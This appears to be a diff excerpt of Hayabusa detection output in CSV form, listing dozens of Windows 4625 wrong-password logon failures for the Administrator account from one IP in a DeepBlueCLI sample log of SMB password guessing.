+2016-09-20 01:52:41.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bsS3JTLUWcFYvxAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.957 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gjM6hj2bGxC124oZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V3IQkVcY5iMTxCRN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.045 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v44Kp3lpGKb6Xd4j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.082 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e1skdEmGlXbzUWk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.181 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: feaA6lAxWjapFbAW | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IJZjTqY5innWcvSZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.273 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ymXIp0KTw0vIbB0N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.316 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZpPJEcLv7BoZaQwT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.357 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Cz14Cv861RhFh0Pa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H8BklDHdS0cdcbGu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: 0m5Mznl2khRMj31V | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.472 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ha6TuN7C8V0roSAK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.517 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9oBW0yE5a9zSkpIH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.566 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n54EaKOUQIX9geqx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.617 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m6WCg3o4oatO42wW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.656 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KfCwo8ZUWiBqI8zC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:42.692 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8potisENMIsbNxcd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WgagMNj95dkg9uQd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o1EVsGLFugwePvgR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 6q00SeueJQAiBGpe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QWzSR1cJ2XJNirSW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.904 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 39MY5ZvRJSHVkZZV | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.944 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WyOdltctwdHNkH6i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:42.989 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OUcWk0xJn9zVMZSF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.023 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: f2sauqNlJi3y0ZBk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.060 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bkih5QcLlcjw9gjg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.104 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3KlUJslcpS9jhLY4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: riuVWV1Ugr9c22hR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.189 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5OSj1I0sXkPf96OL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KsOJDxDiZSjoBj6F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.269 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uH0bQ9zEi1xcfHn3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3AfNT0p4JC1VEfDd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.353 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: S7T8R8U1WVHZQrYk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:43.388 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kamexpa7isWT8gLC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8CyHFKVcdTo0Upx3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.480 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U30aMcZuBD08GWK1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4mihftSCNCYdlBny | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.553 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K2wa0xwK6tnurGJQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.588 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0V3TbNrKEnrDcEYt | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.629 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T73JW9JURm8Br6MA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.673 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OAleyg3h8aMvVVJk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.713 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1LQllnWZFUIWa6rw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.757 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlwPxSGUmvYH0rpL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VrI56o5TyeO48rQV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: CKRMn75tv5Yi5rYK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MbJvec7rVisJ6WCC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.929 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xoubp5WTPqblBaps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:43.965 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rBczkR92cKY41icQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.005 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MfUx3OizEb1LiOzj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.051 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SRaSOLOWhBEr0qkz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:44.085 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YnlI8Zh4td5m1fpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wXUDXDa4wi3HivKo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.174 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TT7iOtVMFcEysCcI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.229 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1NJpI7KC3gj99aWs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.333 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H39cv9JEuLEjlp93 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.389 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4p9h1cjLeUzppSZb | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: E0fOpi4vr55QmO6x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.472 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GiKI4V6kpkY5zc9x | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.513 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dLmu4n9qZdf3Q5zo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.547 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 87iJdX2E0ZJintvr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.592 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nxc4iIHP0kdqQNiG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.637 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: 
Administrator | Type: 3 | Computer: RJIWekwBwcIUWjD1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.686 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GdnvboiIDzXTZ8MR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.740 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QGMPHNpljTlMYeet | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.794 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pWo4uVFtAbe4IjKC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.845 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YAPdDqbMY4rYiuZ3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ai2WCQ3MkWwSeOy9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 
+2016-09-20 01:52:44.946 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ey1wbsD7w3fs02xP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:44.983 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sVGzidwZICNfLizg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.029 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8zjGPMJ6RBw48Ejx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.071 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MydK8AjPvyyckCEL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.105 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4fqkCliAQMiFffQU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:45.149 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITkku4kN4csBFyUB | IP Addr: 192.168.198.149 | AuthPackage: 
